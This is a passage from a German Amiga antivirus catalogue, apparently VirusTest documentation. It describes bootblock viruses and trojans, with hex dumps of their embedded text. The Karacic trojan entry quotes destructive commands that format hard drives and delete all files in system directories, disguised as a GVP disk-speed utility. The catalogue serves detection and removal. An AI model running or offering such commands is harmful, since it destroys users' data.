Vermehrung nur als BB moeglich Unterschiede zu T.F.C : - Text am Fileanfang mit teilweise sinnlosen Zeichen ueber- schrieben. Es ist aber auch z.B. loadwb lesbar. - T.F.C.-BB durch KaKo-BB ersetzt. Wurde bisher schon als Virus erkannt bei FileTest und im Speicher !!! - Karacic-Trojan Zerstoerungsfile andere moegliche Namen: - DiskSpeeder-Trojan - GVP-HardDiskSpeeder-Trojan Laenge gepackt: 1460 Bytes Laenge entpackt: 1924 Bytes Keine verbogenen Vektoren KEINE Selbstvermehrung Verwendet einen Funktionsaufruf, der nach meinem Wissensstand erst ab KS3.0 vorhanden ist. Im entpackten File ist z.B. zu lesen: 72756e20 run 3e4e494c 3a207379 733a7379 7374656d >NIL: sys:system 2f666f72 6d617420 64726976 65206864 /format drive hd 343a206e 616d6520 224b6172 61e769e7 4: name "Kara.i. 20566972 75732073 7472696b 65732062 Virus strikes b 61636b22 00007275 6e203e4e 494c3a20 ack"..run >NIL: 433a6465 6c657465 206c3a23 3f20616c C:delete l:#? al 6c00 l. ;..... 733a 6e6f7468 s:noth 65726500 0f4e6f74 206f6e20 74686973 ere..Not on this 2048440a 536e6f6f 70446f73 20537570 HD.SnoopDos Sup 706f7274 2050726f 63657373 0000003f port Process...? 27486172 64446973 6b537065 65646572 'HardDiskSpeeder 2076312e 350a6279 20475650 20496e63 v1.5.by GVP Inc 2e20a931 3939350a 23486172 64446973 . .1995.#HardDis 6b537065 65646572 2076312e 3520696e kSpeeder v1.5 in 7374616c 6c656420 2e2e2e0a stalled .... Ablauf bei start ohne ?: Suche nach SnoopDos. Gefunden = Ende Suche nach File s:nothere Gefunden = Textausgabe: Not on this HD Im Cli wird ausgegeben: HardDiskSpeeder v1.5 installed ... DosDelay-Pause Requester-Ausgabe entweder Funktion Exec-Reboot oder Beginn der Zerstoerung. Formatiert werden sollen dh0-dh4 oder hd0-hd4 Dieser Vorgang MUSS auffallen. Danach sollen noch alle Files in den Verzeichnissen l, libs, devs, s und c geloescht werden. Bei Start mit ? erfolgt die Ausgabe: HardDiskSpeeder v1.5 by GVP Inc. c1995 - Kauki immer $7ec00, Cool, im Prg. $80, $84, $88 im Prg. auch noch DoIo, schreibt aber spaeter im Prg DoIo von KS1.2 zurueck (nach Vermehrung) den meisten Platz brauchen die Chopperlisten. Das ChopperIntro laeuft auch mit KS1.3 . Kauki im BB nicht sichtbar. - Kefrens SCA-Clone Text im BB: Ohh noo!!!! I think something is wrong! and even better... Some of your disks are sick Watch out! By Kefrens offcourse!!! - Kefrens 2 wie Kefrens = SCA-Clone nur Text verschoben - KHOMEINI-Virus MAD II Clone s.u. Nur Texte geaendert. Im BB ist uncodiert zu lesen: 596f7572 20646973 6b287329 20686173 Your disk(s) has 20626565 6e20706f 73736573 73656420 been possessed 62792074 6865204b 484f4d45 494e4920 by the KHOMEINI 56697275 73212121 21204576 656e2061 Virus!!!! Even a 66746572 20686973 20646561 74682068 fter his death h 65207461 6b657320 72657665 6e676521 e takes revenge! 21212048 412d4841 2d48412d 48412020 !! HA-HA-HA-HA - KICK-Virus SADDAM-Clone wird von VT als SADDAM-Clone erkannt Blocklangwort: KICK Namensbegruendung: im Speicher ist decodiert zu lesen 6b2e6465 76696365 00010820 204b4943 k.device... KIC 4b202056 49525553 00000000 03f30000 K VIRUS........ 00000000 00010000 00000000 00000000 ................ 01c50000 03e90000 01c55573 65204b69 ..........Use Ki 636b7374 61727420 312e322f 312e3300 ckstart 1.2/1.3. 00000000 00000000 00000000 00000000 ................ Use Kick... ist uncodiert im Disk-Validator-File zu lesen. Behandlung: siehe bei SADDAM 09.04.93 - KidCurry-Trojan siehe bei IconD-Trojan - Killed Virus BB immer $7EC00, Cool $7EC92, DoIo $7ECCA KS2.04: ja Fordert trackdisk.device NICHT Vermehrung und Schaden: BB Namensbegruendung: im BB zu lesen: 72790020 4b696c6c 65642000 4ef90000 ry. Killed .N... 0000ffff fdf6436f 70793a30 32390000 ......Copy:029.. Beim Boot-Vorgang li.MT Text ueber Graphik heller Hintergrund, dunkle Schrift Copy:029 Danach re. MT: gleiche Farben: Killed - KIMBLE.BB Virus CREEPING EEL Clone siehe oben Vergleiche: Creeping EEL, Executors Nur Text geaendert: (im BB ist zu lesen) 002f0082 54686973 20697320 616e2041 ./..This is an A 6e746976 69727573 3a202020 20200000 ntivirus: .. 001e00b4 4b204920 4d204220 4c204520 ....K I M B L E 2043204f 204d2045 20532020 42204120 C O M E S B A 434b0000 003c00be 20205573 65206974 CK...<.. Use it 2e2ea120 4b494d42 4c452021 20200000 ... KIMBLE ! .. Rest siehe oben bei Creeping EEL - KIMBLE.BB-Inst. File Laenge: 3212 Bytes Mit der Hunklab-Bootjob-Methode wurde der BB an den c-Befehl type angelinkt. 40.3 (11.4.94) ?????? Hunklab-Bootjob s.o. Die Wahrscheinlichkeit, dass ein LAUFFAEHIGER BB entsteht, ist gering. VT bietet Ausbau an. -------------------------------------------------------------------------- Heiner Schneegold Am Steinert 8 97246 Eibelstadt Deutschland Tel: 09303/99104 (bitte nur 19.00 - 20.00 Uhr) Heiner